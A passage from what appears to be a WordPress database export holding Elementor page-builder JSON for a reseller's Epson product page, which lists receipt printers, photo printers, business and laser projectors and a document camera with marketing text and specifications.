reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"19\",\"bottom\":\"19\",\"left\":\"19\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/h4>\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><\\/center>\\n<\\/span><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><br>\\n\\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\\n<ul>\\n \\t<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>Real-Time Auto Keystone Correction<\\/li>\\n \\t<li>Split Screen Projection<\\/li>\\n \\t<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center<<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8012,3488,'_elementor_version','2.5.14'),(8015,3489,'_wp_page_template','template-fullwidth.php'),(8016,3489,'_elementor_edit_mode','builder'),(8017,3489,'_elementor_template_type','post'),(8018,3489,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" 